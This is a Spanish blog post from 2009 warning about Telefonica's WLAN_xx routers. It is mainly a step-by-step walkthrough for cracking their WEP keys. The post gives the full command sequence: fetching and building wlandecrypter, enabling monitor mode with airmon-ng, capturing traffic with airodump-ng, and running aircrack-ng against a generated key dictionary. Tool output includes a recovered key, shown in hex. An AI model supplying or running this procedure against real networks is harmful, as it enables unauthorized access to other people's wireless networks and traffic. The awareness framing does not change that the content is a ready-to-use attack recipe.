Ojo con las claves WIFI de Telefonica![]() Hace unos dÃas en el taller práctico de seguridad WIFI organizado por AIB hemos podido conocer un sistema más para obtener las contraseñas WEP de los APs o routers de Telefonica. Me estoy refiriendo a los famosos WLAN_xx. Instalar wlandecrypterEn primer lugar descargamos de cualquiera de las webs que recogen esta aplicación una copia para instalar. wget http://www.fileden.com/files/2008/10/11/2138272/wlandecrypter-0.6.tar.gz tar -zxvf wlandecrypter-0.6.tar.gz cd wlandecrypter-0.6/ make $cp wlandecrypter /usr/bin Crear el diccionarioEl diccionario o el listado de claves lo creamos a partir del nombre del AP y su dirección MAC. El nombre del AP es bien fácil de conocer ya que lo vemos directamente en el lÃstado de redes WIFI disponibles, y está formado por la cadena ´WLAN_´ seguido de dos caracteres. $airmon-ng stop ath0 Interface Chipset Driver wifi0 Atheros madwifi-ng ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed) $airmon-ng start wifi0 Interface Chipset Driver wifi0 Atheros madwifi-ng ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled) ...y ejecutamos airodump-ng para descubrir las redes con sus correspondientes direcciones MAC. $airodump-ng ath0 Hecho esto veremos las redes WIFI a nuestro alrededor junto con la MAC y el tipo de encriptación de cada una de ellas. $wlandecrypter 20:33:64:30:50:13 WLAN_K7 diccionario
wlandecrypter 0.6 - (c) 2006 nilp0inter2k6_at_gmail.com
------------> Actualizado por *dudux <------------
http://www.seguridadwireless.net
[+] BSSID: 20:33:64:30:50:13
[+] Modelo: P-660HW-D1
[+] ESSID: WLAN_K7
[+] Fichero de claves: diccionario
[+] Fichero guardadoCon esto ya tenemos creado un archivo de texto llamado "diccionario" y cuyo contenido son todas y cada una de las contraseñas posibles. Capturar tráficoEs el momento de capturar algunos paquetes de la red, para lo que usaremos de nuevo airodump-ng indicando esta vez la MAC y el nombre del archivo en el que queremos que almacene los paquetes. $airodump-ng --bssid 00:13:49:95:A3:73 -w captura --channel 7 ath0 Una vez veamos que la columna #Data contempla algunos paquetes podremos interrumpir airodump. Un par de paquetes ya será suficiente. CH 7 ][ Elapsed: 8 s ][ 2009-06-13 00:25
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
20:33:64:30:50:13 8 7 47 0 7 54. WEP WEP WLAN_K7
BSSID STATION PWR Rate Lost Packets Probes
22:35:12:41:12:23 00:2E:61:17:61:44 10 11-11 372 51Obtener la contraseña WEPHemos creado la tabla de contraseñas con Wlandecrypter y capturado tráfico con airodump-ng, asà que estamos en disposición de ejecutar aircrack para dar con la contraseña correcta. $aircrack-ng -w diccionario captura-01.cap -K
[00:00:32] Tested 48157 keys (got 22 IVs)
KB depth byte(vote)
0 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
1 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
2 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
3 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
4 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
5 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
6 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
7 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
8 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
9 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
10 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
11 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
12 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
KEY FOUND! [ 1A:21:32:43:54:65:76:87:98:39:43:43:46 ] (ASCII: XXXXXXXXXXXXX )
Decrypted correctly: 100%Y ahà la tenemos. La clave del AP obtenida en cuestión de segundos (sÃ, la he ocultado a drede!). 13-06-2009 Comentarios: Pues yo pienso que: | Feed RSS¿Esto qué es?Un intento de blog. Tengo esa mala costumbre de hacérmelo todo y me he resistido a la tentación de usar blogspot o Wordpress terminando por programarme mi propio blog. Soy asÃ... luego me pasa lo que me pasa. ¿Y por donde paras? |
la ocultas en ascci y no la ocultas en hexadecimal, tu no sabes que es lo mismo meterla en ascci que meter todos los numero hexadecimales sin los dos puntos....te podias haber ahorrado el ocultarla y el tonto comentario de "la he ocultado a drede" XD
Gracias por el comentario!